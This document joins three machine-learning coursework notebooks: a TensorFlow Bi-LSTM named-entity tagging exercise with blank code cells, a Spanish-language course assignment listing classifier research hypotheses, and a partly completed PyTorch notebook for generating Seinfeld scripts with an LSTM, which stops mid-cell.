# Pass them through Bidirectional Dynamic RNN (tf.nn.bidirectional_dynamic_rnn).
# Shape: [batch_size, sequence_len, 2 * n_hidden_rnn].
# Also don't forget to initialize sequence_length as self.lengths and dtype as tf.float32.
(rnn_output_fw, rnn_output_bw), _ = ######### YOUR CODE HERE #############
rnn_output = tf.concat([rnn_output_fw, rnn_output_bw], axis=2)
# Dense layer on top.
# Shape: [batch_size, sequence_len, n_tags].
self.logits = tf.layers.dense(rnn_output, n_tags, activation=None)
BiLSTMModel.__build_layers = classmethod(build_layers)
```
To compute the actual predictions of the neural network, you need to apply [softmax](https://www.tensorflow.org/api_docs/python/tf/nn/softmax) to the last layer and find the most probable tags with [argmax](https://www.tensorflow.org/api_docs/python/tf/argmax).
```
def compute_predictions(self):
"""Transforms logits to probabilities and finds the most probable tags."""
# Create softmax (tf.nn.softmax) function
softmax_output = ######### YOUR CODE HERE #############
# Use argmax (tf.argmax) to get the most probable tags
# Don't forget to set axis=-1
# otherwise argmax will be calculated in a wrong way
self.predictions = ######### YOUR CODE HERE #############
BiLSTMModel.__compute_predictions = classmethod(compute_predictions)
```
During training we do not need predictions of the network, but we need a loss function. We will use [cross-entropy loss](http://ml-cheatsheet.readthedocs.io/en/latest/loss_functions.html#cross-entropy), efficiently implemented in TF as
[cross entropy with logits](https://www.tensorflow.org/api_docs/python/tf/nn/softmax_cross_entropy_with_logits_v2). Note that it should be applied to logits of the model (not to softmax probabilities!). Also note, that we do not want to take into account loss terms coming from `<PAD>` tokens. So we need to mask them out, before computing [mean](https://www.tensorflow.org/api_docs/python/tf/reduce_mean).
```
def compute_loss(self, n_tags, PAD_index):
"""Computes masked cross-entopy loss with logits."""
# Create cross entropy function function (tf.nn.softmax_cross_entropy_with_logits_v2)
ground_truth_tags_one_hot = tf.one_hot(self.ground_truth_tags, n_tags)
loss_tensor = ######### YOUR CODE HERE #############
mask = tf.cast(tf.not_equal(self.input_batch, PAD_index), tf.float32)
# Create loss function which doesn't operate with <PAD> tokens (tf.reduce_mean)
# Be careful that the argument of tf.reduce_mean should be
# multiplication of mask and loss_tensor.
self.loss = ######### YOUR CODE HERE #############
BiLSTMModel.__compute_loss = classmethod(compute_loss)
```
The last thing to specify is how we want to optimize the loss.
We suggest that you use [Adam](https://www.tensorflow.org/api_docs/python/tf/train/AdamOptimizer) optimizer with a learning rate from the corresponding placeholder.
You will also need to apply clipping to eliminate exploding gradients. It can be easily done with [clip_by_norm](https://www.tensorflow.org/api_docs/python/tf/clip_by_norm) function.
```
def perform_optimization(self):
"""Specifies the optimizer and train_op for the model."""
# Create an optimizer (tf.train.AdamOptimizer)
self.optimizer = ######### YOUR CODE HERE #############
self.grads_and_vars = self.optimizer.compute_gradients(self.loss)
# Gradient clipping (tf.clip_by_norm) for self.grads_and_vars
# Pay attention that you need to apply this operation only for gradients
# because self.grads_and_vars also contains variables.
# list comprehension might be useful in this case.
clip_norm = tf.cast(1.0, tf.float32)
self.grads_and_vars = ######### YOUR CODE HERE #############
self.train_op = self.optimizer.apply_gradients(self.grads_and_vars)
BiLSTMModel.__perform_optimization = classmethod(perform_optimization)
```
Congratulations! You have specified all the parts of your network. You may have noticed, that we didn't deal with any real data yet, so what you have written is just recipes on how the network should function.
Now we will put them to the constructor of our Bi-LSTM class to use it in the next section.
```
def init_model(self, vocabulary_size, n_tags, embedding_dim, n_hidden_rnn, PAD_index):
self.__declare_placeholders()
self.__build_layers(vocabulary_size, embedding_dim, n_hidden_rnn, n_tags)
self.__compute_predictions()
self.__compute_loss(n_tags, PAD_index)
self.__perform_optimization()
BiLSTMModel.__init__ = classmethod(init_model)
```
## Train the network and predict tags
[Session.run](https://www.tensorflow.org/api_docs/python/tf/Session#run) is a point which initiates computations in the graph that we have defined. To train the network, we need to compute *self.train_op*, which was declared in *perform_optimization*. To predict tags, we just need to compute *self.predictions*. Anyway, we need to feed actual data through the placeholders that we defined before.
```
def train_on_batch(self, session, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability):
feed_dict = {self.input_batch: x_batch,
self.ground_truth_tags: y_batch,
self.learning_rate_ph: learning_rate,
self.dropout_ph: dropout_keep_probability,
self.lengths: lengths}
session.run(self.train_op, feed_dict=feed_dict)
BiLSTMModel.train_on_batch = classmethod(train_on_batch)
```
Implement the function *predict_for_batch* by initializing *feed_dict* with input *x_batch* and *lengths* and running the *session* for *self.predictions*.
```
def predict_for_batch(self, session, x_batch, lengths):
######################################
######### YOUR CODE HERE #############
######################################
return predictions
BiLSTMModel.predict_for_batch = classmethod(predict_for_batch)
```
We finished with necessary methods of our BiLSTMModel model and almost ready to start experimenting.
### Evaluation
To simplify the evaluation process we provide two functions for you:
- *predict_tags*: uses a model to get predictions and transforms indices to tokens and tags;
- *eval_conll*: calculates precision, recall and F1 for the results.
```
from evaluation import precision_recall_f1
def predict_tags(model, session, token_idxs_batch, lengths):
"""Performs predictions and transforms indices to tokens and tags."""
tag_idxs_batch = model.predict_for_batch(session, token_idxs_batch, lengths)
tags_batch, tokens_batch = [], []
for tag_idxs, token_idxs in zip(tag_idxs_batch, token_idxs_batch):
tags, tokens = [], []
for tag_idx, token_idx in zip(tag_idxs, token_idxs):
tags.append(idx2tag[tag_idx])
tokens.append(idx2token[token_idx])
tags_batch.append(tags)
tokens_batch.append(tokens)
return tags_batch, tokens_batch
def eval_conll(model, session, tokens, tags, short_report=True):
"""Computes NER quality measures using CONLL shared task script."""
y_true, y_pred = [], []
for x_batch, y_batch, lengths in batches_generator(1, tokens, tags):
tags_batch, tokens_batch = predict_tags(model, session, x_batch, lengths)
if len(x_batch[0]) != len(tags_batch[0]):
raise Exception("Incorrect length of prediction for the input, "
"expected length: %i, got: %i" % (len(x_batch[0]), len(tags_batch[0])))
predicted_tags = []
ground_truth_tags = []
for gt_tag_idx, pred_tag, token in zip(y_batch[0], tags_batch[0], tokens_batch[0]):
if token != '<PAD>':
ground_truth_tags.append(idx2tag[gt_tag_idx])
predicted_tags.append(pred_tag)
# We extend every prediction and ground truth sequence with 'O' tag
# to indicate a possible end of entity.
y_true.extend(ground_truth_tags + ['O'])
y_pred.extend(predicted_tags + ['O'])
results = precision_recall_f1(y_true, y_pred, print_results=True, short_report=short_report)
return results
```
## Run your experiment
Create *BiLSTMModel* model with the following parameters:
- *vocabulary_size* — number of tokens;
- *n_tags* — number of tags;
- *embedding_dim* — dimension of embeddings, recommended value: 200;
- *n_hidden_rnn* — size of hidden layers for RNN, recommended value: 200;
- *PAD_index* — an index of the padding token (`<PAD>`).
Set hyperparameters. You might want to start with the following recommended values:
- *batch_size*: 32;
- 4 epochs;
- starting value of *learning_rate*: 0.005
- *learning_rate_decay*: a square root of 2;
- *dropout_keep_probability*: try several values: 0.1, 0.5, 0.9.
However, feel free to conduct more experiments to tune hyperparameters and earn extra points for the assignment.
```
tf.reset_default_graph()
model = ######### YOUR CODE HERE #############
batch_size = ######### YOUR CODE HERE #############
n_epochs = ######### YOUR CODE HERE #############
learning_rate = ######### YOUR CODE HERE #############
learning_rate_decay = ######### YOUR CODE HERE #############
dropout_keep_probability = ######### YOUR CODE HERE #############
```
If you got an error *"Tensor conversion requested dtype float64 for Tensor with dtype float32"* in this point, check if there are variables without dtype initialised. Set the value of dtype equals to *tf.float32* for such variables.
Finally, we are ready to run the training!
```
sess = tf.Session()
sess.run(tf.global_variables_initializer())
print('Start training... \n')
for epoch in range(n_epochs):
# For each epoch evaluate the model on train and validation data
print('-' * 20 + ' Epoch {} '.format(epoch+1) + 'of {} '.format(n_epochs) + '-' * 20)
print('Train data evaluation:')
eval_conll(model, sess, train_tokens, train_tags, short_report=True)
print('Validation data evaluation:')
eval_conll(model, sess, validation_tokens, validation_tags, short_report=True)
# Train the model
for x_batch, y_batch, lengths in batches_generator(batch_size, train_tokens, train_tags):
model.train_on_batch(sess, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability)
# Decaying the learning rate
learning_rate = learning_rate / learning_rate_decay
print('...training finished.')
```
Now let us see full quality reports for the final model on train, validation, and test sets. To give you a hint whether you have implemented everything correctly, you might expect F-score about 40% on the validation set.
**The output of the cell below (as well as the output of all the other cells) should be present in the notebook for peer2peer review!**
```
print('-' * 20 + ' Train set quality: ' + '-' * 20)
train_results = eval_conll(model, sess, train_tokens, train_tags, short_report=False)
print('-' * 20 + ' Validation set quality: ' + '-' * 20)
validation_results = ######### YOUR CODE HERE #############
print('-' * 20 + ' Test set quality: ' + '-' * 20)
test_results = ######### YOUR CODE HERE #############
```
### Conclusions
Could we say that our model is state of the art and the results are acceptable for the task? Definately, we can say so. Nowadays, Bi-LSTM is one of the state of the art approaches for solving NER problem and it outperforms other classical methods. Despite the fact that we used small training corpora (in comparison with usual sizes of corpora in Deep Learning), our results are quite good. In addition, in this task there are many possible named entities and for some of them we have only several dozens of trainig examples, which is definately small. However, the implemented model outperforms classical CRFs for this task. Even better results could be obtained by some combinations of several types of methods, e.g. see [this](https://arxiv.org/abs/1603.01354) paper if you are interested.
|
github_jupyter
|
<center><img src="http://www.exalumnos.usm.cl/wp-content/uploads/2015/06/Isotipo-Negro.gif" title="Title text" width="30%" /></center>
<hr style="height:2px;border:none"/>
<h1 align='center'> INF-398 Aprendizaje Automático </h1>
<H3 align='center'> Tarea/Taller 1 </H3>
<hr style="height:2px;border:none"/>
# Temas
* Clasificadores Discriminativos Clásicos
* Clasificadores Generativos Clásicos
* Evaluación de Clasificadores
# Reglas & Formalidades
* Pueden trabajar en equipos de 2 a 3 personas.
* Los equipos deben ser inscritos antes del 24 Septiembre.
* Pueden reusar código visto en clases y/o recolectar código/ideas de otros sitios, mencionando al autor y entregando un link a la fuente.
* Si resulta necesaria, la intervención de personas ajenas al grupo (e.g. experto) debe ser declarada y justificada.
* Tener roles dentro del equipo está bien, pero al final del proceso, cada miembro debe entender y estar en condiciones de exponer todo el trabajo realizado.
## Entregables
> * **Video:** Se debe preparar un video explicativo de **15 a 20 minutos** donde se describe la metodología utilizada, los resultados obtenidos y las conclusiones de la experiencia.
> * **Código:** Se debe enviar un jupyter notebook con el código utilizado, de modo que sea posible **reproducir los resultados** presentados. Como alternativa, se puede entregar un link Github con el código fuente, incluyendo instrucciones precisas para ejecutar los experimentos. En cualquier caso (notebook o repo) el código debe estar ordenado y seccionado apropiadamente.
> * **Conformidad Ética:** Se debe incluir una breve declaración ética en que se indique que el trabajo que se está enviando es un trabajo original, desarollado por los autores en conformidad con todas reglas antes mencionadas. Se debe también mencionar brevemente cuál fue la contribución de cada miembro del equipo. La declaración puede ser parte del notebook o estar en un archivo dentro del repo.
> * **Defensa en vivo (video-conferencia):** El día de clases agendado para la discusión del taller, se seleccionarán aleatoriamente algunos equipos que presentarán oralmente su trabajo ante el curso. Los autores serán evaluados considerando la discusión y debate que generen entre sus pares. Los puntos obtenidos (positivos o negativos) se sumarán a la nota final de taller.
## Fechas
> * Defensas: 15 de Octubre, horario de clases.
> * Fecha de entrega de vídeo: 16 de Octubre 23:59 Hrs. (1 días después de encuentro).
> * Fecha de entrega de Jupyter (notebook): 15 de Octubre 08:00 (se pueden hacer actualizaciones hasta el 16 de Octubre 23:59 Hrs.).
# Instrucciones
La tarea se divide en dos secciones:
> **1. Pregunta de Investigación**. Para esta parte, los autores deben elegir una hipótesis de investigación y diseñar un procedimiento experimental que permita reunir evidencia en contra o a favor de la misma. Es legítimo tomar una posición *a-priori* en base a lo que han aprendido en el curso, pero es importante analizar críticamente los resultados sin descartar hipótesis alternativas.
> La metodología debe incluir al menos 3 datasets, de los cuales al menos 2 deben ser reales. Es deseable también que incluyan experimentos controlados sobre dataset sintéticos o semi-sintéticos no triviales diseñados por ustedes. Por ejemplo, para demostrar que un método logra ignorar variables irrelevantes se podrían crear variables "fake" manualmente. Experimentos de este último tipo que se basen en un dataset real contarán como realizados sobre "dataset reales".
> Si no es relevante para la pregunta de investigación y en honor al tiempo, no es necesario llevar a cabo un análisis exploratorio detallado sobre cada dataset utilizado.
> **2. Desafío Kaggle**. Para esta parte, los autores enfrentarán un desafío en la plataforma Kaggle y serán calificados en base a su posición en el tablero de resultados y el puntaje obtenido.
<hr style="height:2px;border:none"/>
# Parte 1. Pregunta de Investigación
Reuna evidencia experimental para refutar o sostener una de las siguientes hipótesis u afirmaciones (máximo 2 equipos por hipótesis).
Elegir tema acá **usando el nombre del equipo**:
https://doodle.com/poll/qgw7h5xb72khqq9x?utm_source=poll&utm_medium=link
> **1. Clasificadores Discriminativos versus Generativos.** Con muy pocos ejemplos etiquetados, un clasificador generativo alcanza un mejor error de clasificación que un clasificador discriminativo. Sin embargo, a medida que aumenta el número de ejemplos, la situación se invierte.
> **2. Perceptrón y Margen.** La cota teórica que relaciona el número de iteraciones del perceptrón con el margen no se verifica experimentalmente, sobre pasándose en la mayoría de los casos.
> **3. Margen y Overfitting.** El error de predicción de un clasificador lineal no es directamente proporcional al margen obtenido, pero el grado de overfitting sí lo es.
> **4. Regresión Logística Multi-class.**: En problemas multi-class, usar un regresor logístico con heurísticas como OVO permite obtener un mejor desempeño que la extensión nativa.
> **5. Label Noise.**: Un clasificador de tipo generativo es extremadamente sensible a errores de etiquetación, es decir aún si un porcentaje pequeño (< 10%) de las etiquetas de entrenamiento está corrupta, su desempeño se deteriora significativamente (> 10% de acccuracy).
> **6. Crowdsourcing.**: Al entrenar un clasificador logístico con múltiples anotaciones por dato (provistas por diferentes anotadores), el clasificador aprende a predecir la etiqueta mayoritaria.
> **7. Regresión Logística con Pesos:** Modificar los pesos de cada clase en la función objetivo del clasificador logístico permite mejorar los resultados en problemas de clasificación desbalanceados.
> **8. Texto & NLP.** En problemas de clasificación de texto, un modelo Bayesiano Ingenuo puede superar el desempeño de un clasificador discriminativo entrenado sobre una representación neuronal simple tipo AWE.
> **9. Texto & NLP.** Al entrenar un clasificador logístico para texto, el uso de mecanismos para "pesar" los términos, como TF-IDF, no genera mejoras significativas ya que el clasificador "aprende" directamente estos pesos durante el entrenamiento.
> **10. Entre LDA y QDA.** Un "híbrido" LDA/QDA supera tanto a QDA como a LDA.
> Definición del Híbrido: denotemos por $\hat{\Sigma}_k$ las matrices de covarianza obtenidas por QDA y por $\hat{\Sigma}$ la (única) matriz de covarianza obtenida por LDA. El híbrido se define como un clasificador gausiano que usa $\hat{\Sigma}_{k} = (1-\lambda) \hat{\Sigma}_k + \lambda \hat{\Sigma}$ como matriz de covarianza para cada clase ($\lambda$ debe ser seleccionado para cada problema).
> **11. Instance Weighting**: Si se re-entrena un clasificador asignando mayor "peso" a los ejemplos que éste clasificó mal en un primer entrenamiento, observaremos una mejora en su desempeño final sobre el conjunto de pruebas.
> **12. Instance Weighting**: Si se re-entrena un clasificador asignando mayor "peso" a los ejemplos de entrenamiento más parecidos a los ejemplos de prueba (sólo x), observaremos una mejora en su desempeño final sobre ese último conjunto.
> **13. Clases Desbalanceadas**: Un desbalance en la cantidad de ejemplos por clase afecta mucho más el desempeño de un clasificador discriminativo que el desempeño de un clasificador generativo, ya que en este último caso es posible ajustar manualmente los *a-priori* para corregir la situación.
> **14. Datos Faltantes**: La imputación de atributos faltantes mediante criterios sencillos como la moda o la media deteriora significativamente el desempeño de un clasificador generativo, no así de un clasificador discriminativo.
> **15. Métricas de Evaluación:** El área bajo la curva ROC es proporcional al área bajo la curva PR y por lo tanto un clasificador que supera a otro en términos de AUROC lo hace también en términos de AUPR.
> **16. Métricas de Evaluación:** En problemas de clasificación con clases muy desbalanceadas, las métricas denominadas *Micro-average F-Score* y *AUPR* producen un ranking similar sobre un conjunto de clasificadores.
> **17. Selección de Modelos:** Estimar el error de predicción de un clasificador usando un subconjunto de validación reservado desde dataset original produce resultados muy variables dependiendo del porcentaje seleccionado. Desafortundamente, lo mismo sucede con *K-fold crossvalidation* al considerar diferentes valores de K.
> **18. Selección de Modelos:** El número de variables con que se entrena un modelo es inversamente proporcional al error de pruebas y directamente proporcional a la diferencia entre el error de validación y el error de entrenamiento.
> **19. Selección de Modelos:** Seleccionar el valor de dos hiper-parámetros usando dos validaciones cruzadas independientes es tan efectivo como un utilizar un esquema anidado (nested CV).
# Parte 2. Desafío
> TO BE ANNOUNCED.
|
github_jupyter
|
# TV Script Generation
In this project, you'll generate your own [Seinfeld](https://en.wikipedia.org/wiki/Seinfeld) TV scripts using RNNs. You'll be using part of the [Seinfeld dataset](https://www.kaggle.com/thec03u5/seinfeld-chronicles#scripts.csv) of scripts from 9 seasons. The Neural Network you'll build will generate a new ,"fake" TV script, based on patterns it recognizes in this training data.
## Get the Data
The data is already provided for you in `./data/Seinfeld_Scripts.txt` and you're encouraged to open that file and look at the text.
>* As a first step, we'll load in this data and look at some samples.
* Then, you'll be tasked with defining and training an RNN to generate a new script!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# load in data
import helper
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
```
## Explore the Data
Play around with `view_line_range` to view different parts of the data. This will give you a sense of the data you'll be working with. You can see, for example, that it is all lowercase text, and each new line of dialogue is separated by a newline character `\n`.
```
view_line_range = (0, 10)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import numpy as np
print('Dataset Stats')
print('Roughly the number of unique words: {}'.format(len({word: None for word in text.split()})))
lines = text.split('\n')
print('Number of lines: {}'.format(len(lines)))
word_count_line = [len(line.split()) for line in lines]
print('Average number of words in each line: {}'.format(np.average(word_count_line)))
print()
print('The lines {} to {}:'.format(*view_line_range))
print('\n'.join(text.split('\n')[view_line_range[0]:view_line_range[1]]))
```
---
## Implement Pre-processing Functions
The first thing to do to any dataset is pre-processing. Implement the following pre-processing functions below:
- Lookup Table
- Tokenize Punctuation
### Lookup Table
To create a word embedding, you first need to transform the words to ids. In this function, create two dictionaries:
- Dictionary to go from the words to an id, we'll call `vocab_to_int`
- Dictionary to go from the id to word, we'll call `int_to_vocab`
Return these dictionaries in the following **tuple** `(vocab_to_int, int_to_vocab)`
```
import problem_unittests as tests
from collections import Counter
def create_lookup_tables(text):
"""
Create lookup tables for vocabulary
:param text: The text of tv scripts split into words
:return: A tuple of dicts (vocab_to_int, int_to_vocab)
"""
# TODO: Implement Function
word_counter = Counter(text)
sorted_vocab_list = sorted(word_counter, key=word_counter.get, reverse=True)
vocab_to_int = {word: i for i, word in enumerate(sorted_vocab_list)} #Do not need to start from index 1 because no padding.
int_to_vocab = {i: word for word, i in vocab_to_int.items()}
# return tuple
return (vocab_to_int, int_to_vocab)
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_create_lookup_tables(create_lookup_tables)
```
### Tokenize Punctuation
We'll be splitting the script into a word array using spaces as delimiters. However, punctuations like periods and exclamation marks can create multiple ids for the same word. For example, "bye" and "bye!" would generate two different word ids.
Implement the function `token_lookup` to return a dict that will be used to tokenize symbols like "!" into "||Exclamation_Mark||". Create a dictionary for the following symbols where the symbol is the key and value is the token:
- Period ( **.** )
- Comma ( **,** )
- Quotation Mark ( **"** )
- Semicolon ( **;** )
- Exclamation mark ( **!** )
- Question mark ( **?** )
- Left Parentheses ( **(** )
- Right Parentheses ( **)** )
- Dash ( **-** )
- Return ( **\n** )
This dictionary will be used to tokenize the symbols and add the delimiter (space) around it. This separates each symbols as its own word, making it easier for the neural network to predict the next word. Make sure you don't use a value that could be confused as a word; for example, instead of using the value "dash", try using something like "||dash||".
```
def token_lookup():
"""
Generate a dict to turn punctuation into a token.
:return: Tokenized dictionary where the key is the punctuation and the value is the token
"""
# TODO: Implement Function
token_dict = {
'.': "||dot||",
',': "||comma||",
'"': "||doublequote||",
';': "||semicolon||",
'!': "||bang||",
'?': "||questionmark||",
'(': "||leftparens||",
')': "||rightparens||",
'-': "||dash||",
'\n': "||return||",
}
return token_dict
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_tokenize(token_lookup)
```
## Pre-process all the data and save it
Running the code cell below will pre-process all the data and save it to file. You're encouraged to lok at the code for `preprocess_and_save_data` in the `helpers.py` file to see what it's doing in detail, but you do not need to change this code.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# pre-process training data
helper.preprocess_and_save_data(data_dir, token_lookup, create_lookup_tables)
```
# Check Point
This is your first checkpoint. If you ever decide to come back to this notebook or have to restart the notebook, you can start from here. The preprocessed data has been saved to disk.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import helper
import problem_unittests as tests
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
```
## Build the Neural Network
In this section, you'll build the components necessary to build an RNN by implementing the RNN Module and forward and backpropagation functions.
### Check Access to GPU
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
# Check for a GPU
train_on_gpu = torch.cuda.is_available()
if not train_on_gpu:
print('No GPU found. Please use a GPU to train your neural network.')
```
## Input
Let's start with the preprocessed input data. We'll use [TensorDataset](http://pytorch.org/docs/master/data.html#torch.utils.data.TensorDataset) to provide a known format to our dataset; in combination with [DataLoader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader), it will handle batching, shuffling, and other dataset iteration functions.
You can create data with TensorDataset by passing in feature and target tensors. Then create a DataLoader as usual.
```
data = TensorDataset(feature_tensors, target_tensors)
data_loader = torch.utils.data.DataLoader(data,
batch_size=batch_size)
```
### Batching
Implement the `batch_data` function to batch `words` data into chunks of size `batch_size` using the `TensorDataset` and `DataLoader` classes.
>You can batch words using the DataLoader, but it will be up to you to create `feature_tensors` and `target_tensors` of the correct size and content for a given `sequence_length`.
For example, say we have these as input:
```
words = [1, 2, 3, 4, 5, 6, 7]
sequence_length = 4
```
Your first `feature_tensor` should contain the values:
```
[1, 2, 3, 4]
```
And the corresponding `target_tensor` should just be the next "word"/tokenized word value:
```
5
```
This should continue with the second `feature_tensor`, `target_tensor` being:
```
[2, 3, 4, 5] # features
6 # target
```
```
from torch.utils.data import TensorDataset, DataLoader
def batch_data(words, sequence_length, batch_size):
"""
Batch the neural network data using DataLoader
:param words: The word ids of the TV scripts
:param sequence_length: The sequence length of each batch
:param batch_size: The size of each batch; the number of sequences in a batch
:return: DataLoader with batched data
"""
# TODO: Implement function
features = []
targets = []
print(words, sequence_length, batch_size)
for start in range(len(words) - sequence_length):
end = start + sequence_length
features.append(words[start:end])
targets.append(words[end])
data = TensorDataset(torch.tensor(features), torch.tensor(targets))
data_loader = DataLoader(data, batch_size, True)
# return a dataloader
return data_loader
# there is no test for this function, but you are encouraged to create
# print statements and tests of your own
```
### Test your dataloader
You'll have to modify this code to test a batching function, but it should look fairly similar.
Below, we're generating some test text data and defining a dataloader using the function you defined, above. Then, we are getting some sample batch of inputs `sample_x` and targets `sample_y` from our dataloader.
Your code should return something like the following (likely in a different order, if you shuffled your data):
```
torch.Size([10, 5])
tensor([[ 28, 29, 30, 31, 32],
[ 21, 22, 23, 24, 25],
[ 17, 18, 19, 20, 21],
[ 34, 35, 36, 37, 38],
[ 11, 12, 13, 14, 15],
[ 23, 24, 25, 26, 27],
[ 6, 7, 8, 9, 10],
[ 38, 39, 40, 41, 42],
[ 25, 26, 27, 28, 29],
[ 7, 8, 9, 10, 11]])
torch.Size([10])
tensor([ 33, 26, 22, 39, 16, 28, 11, 43, 30, 12])
```
### Sizes
Your sample_x should be of size `(batch_size, sequence_length)` or (10, 5) in this case and sample_y should just have one dimension: batch_size (10).
### Values
You should also notice that the targets, sample_y, are the *next* value in the ordered test_text data. So, for an input sequence `[ 28, 29, 30, 31, 32]` that ends with the value `32`, the corresponding output should be `33`.
```
# test dataloader
test_text = range(50)
t_loader = batch_data(test_text, sequence_length=5, batch_size=10)
data_iter = iter(t_loader)
sample_x, sample_y = data_iter.next()
print(sample_x.shape)
print(sample_x)
print()
print(sample_y.shape)
print(sample_y)
```
---
## Build the Neural Network
Implement an RNN using PyTorch's [Module class](http://pytorch.org/docs/master/nn.html#torch.nn.Module). You may choose to use a GRU or an LSTM. To complete the RNN, you'll have to implement the following functions for the class:
- `__init__` - The initialize function.
- `init_hidden` - The initialization function for an LSTM/GRU hidden state
- `forward` - Forward propagation function.
The initialize function should create the layers of the neural network and save them to the class. The forward propagation function will use these layers to run forward propagation and generate an output and a hidden state.
**The output of this model should be the *last* batch of word scores** after a complete sequence has been processed. That is, for each input sequence of words, we only want to output the word scores for a single, most likely, next word.
### Hints
1. Make sure to stack the outputs of the lstm to pass to your fully-connected layer, you can do this with `lstm_output = lstm_output.contiguous().view(-1, self.hidden_dim)`
2. You can get the last batch of word scores by shaping the output of the final, fully-connected layer like so:
```
# reshape into (batch_size, seq_length, output_size)
output = output.view(batch_size, -1, self.output_size)
# get last batch
out = output[:, -1]
```
```
import torch.nn as nn
class RNN(nn.Module):
def __init__(self, vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5):
"""
Initialize the PyTorch RNN Module
:param vocab_size: The number of input dimensions of the neural network (the size of the vocabulary)
:param output_size: The number of output dimensions of the neural network
:param embedding_dim: The size of embeddings, should you choose to use them
:param hidden_dim: The size of the hidden layer outputs
:param dropout: dropout to add in between LSTM/GRU layers
"""
super(RNN, self).__init__()
# TODO: Implement function
# set class variables
self.output_size = output_size
self.n_layers = n_layers
self.hidden_dim = hidden_dim
# define model layers
self.embed = nn.Embedding(vocab_size, embedding_dim)
self.rnn = nn.LSTM(embedding_dim, self.hidden_dim, self.n_layers, dropout=dropout, batch_first=True)
self.fc = nn.Linear(self.hidden_dim, self.output_size)
def forward(self, nn_input, hidden):
"""
Forward propagation of the neural network
:param nn_input: The input to the neural network
:param hidden: The hidden state
:return: Two Tensors, the output of the neural network and the latest hidden state
"""
# TODO: Implement function
x = self.embed(nn_input)
x, hidden = self.rnn(x, hidden)
x = x.contiguous().view(-1, self.hidden_dim)
x = self.fc(x)
x = x.view(nn_input.size(0), -1, self.output_size)[:, -1]
# return one batch of output word scores and the hidden state
return x, hidden
def init_hidden(self, batch_size):
'''
Initialize the hidden state of an LSTM/GRU
:param batch_size: The batch_size of the hidden state
:return: hidden state of dims (n_layers, batch_size, hidden_dim)
'''
# Implement function
# initialize hidden state with zero weights, and move to GPU if available
weight = next(self.parameters()).data
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_())
if train_on_gpu:
hidden = (hidden[0].cuda(), hidden[1].cuda())
return hidden
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_rnn(RNN, train_on_gpu)
```
### Define forward and backpropagation
Use the RNN class you implemented to apply forward and back propagation. This function will be called, iteratively, in the training loop as follows:
```
loss = forward_back_prop(decoder, decoder_optimizer, criterion, inp, target)
```
And it should return the average loss over a batch and the hidden state returned by a call to `RNN(inp, hidden)`. Recall that you can get this loss by computing it, as usual, and calling `loss.item()`.
**If a GPU is available, you should move your data to that GPU device, here.**
```
def forward_back_prop(rnn, optimizer, criterion, inp, target, hidden):
"""
Forward and backward propagation on the neural network
:param decoder: The PyTorch Module that holds the neural network
:param decoder_optimizer: The PyTorch optimizer for the neural network
:param criterion: The PyTorch loss function
:param inp: A batch of input to the neural network
:param target: The target output for the batch of input
:return: The loss and the latest hidden state Tensor
"""
# TODO: Implement Function
# move data to GPU, if available
if train_on_gpu:
inp, target = inp.cuda(), target.cuda()
# perform backpropagation and optimization
hidden = tuple([each.data for each in hidden])
optimizer.zero_grad()
rnn.zero_grad()
output, hidden = rnn(inp, hidden)
loss = criterion(output, target)
loss.backward()
nn.utils.clip_grad_norm_(rnn.parameters(), 5)
optimizer.step()
# return the loss over a batch and the hidden state produced by our model
return loss.item(), hidden
# Note that these tests aren't completely extensive.
# they are here to act as general checks on the expected outputs of your functions
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
tests.test_forward_back_prop(RNN, forward_back_prop, train_on_gpu)
```
## Neural Network Training
With the structure of the network complete and data ready to be fed in the neural network, it's time to train it.
### Train Loop
The training loop is implemented for you in the `train_decoder` function. This function will train the network over all the batches for the number of epochs given. The model progress will be shown every number of batches. This number is set with the `show_every_n_batches` parameter. You'll set this parameter along with other parameters in the next section.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
def train_rnn(rnn, batch_size, optimizer, criterion, n_epochs, show_every_n_batches=100):
batch_losses = []
rnn.train()
print("Training for %d epoch(s)..." % n_epochs)
for epoch_i in range(1, n_epochs + 1):
# initialize hidden state
hidden = rnn.init_hidden(batch_size)
for batch_i, (inputs, labels) in enumerate(train_loader, 1):
# make sure you iterate over completely full batches, only
n_batches = len(train_loader.dataset)//batch_size
if(batch_i > n_batches):
break
# forward, back prop
loss, hidden = forward_back_prop(rnn, optimizer, criterion, inputs, labels, hidden)
# record loss
batch_losses.append(loss)
# printing loss stats
if batch_i % show_every_n_batches == 0:
print('Epoch: {:>4}/{:<4} Loss: {}\n'.format(
epoch_i, n_epochs, np.average(batch_losses)))
batch_losses = []
# returns a trained rnn
return rnn
```
### Hyperparameters
Set and train the neural network with the following parameters:
- Set `sequence_length` to the length of a sequence.
- Set `batch_size` to the batch size.
- Set `num_epochs` to the number of epochs to train for.
- Set `learning_rate` to the learning rate for an Adam optimizer.
- Set `vocab_size` to the number of uniqe tokens in our vocabulary.
- Set `output_size` to the desired size of the output.
- Set `embedding_dim` to the embedding dimension; smaller than the vocab_size.
- Set `hidden_dim` to the hidden dimension of your RNN.
- Set `n_layers` to the number of layers/cells in your RNN.
- Set `show_every_n_batches` to the number of batches at which the neural network should print progress.
If the network isn't getting the desired results, tweak these parameters and/or the layers in the `RNN` class.
```
# Data params
# Sequence Length
sequence_length = 8 # of words in a sequence
# Batch Size
batch_size = 128
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)
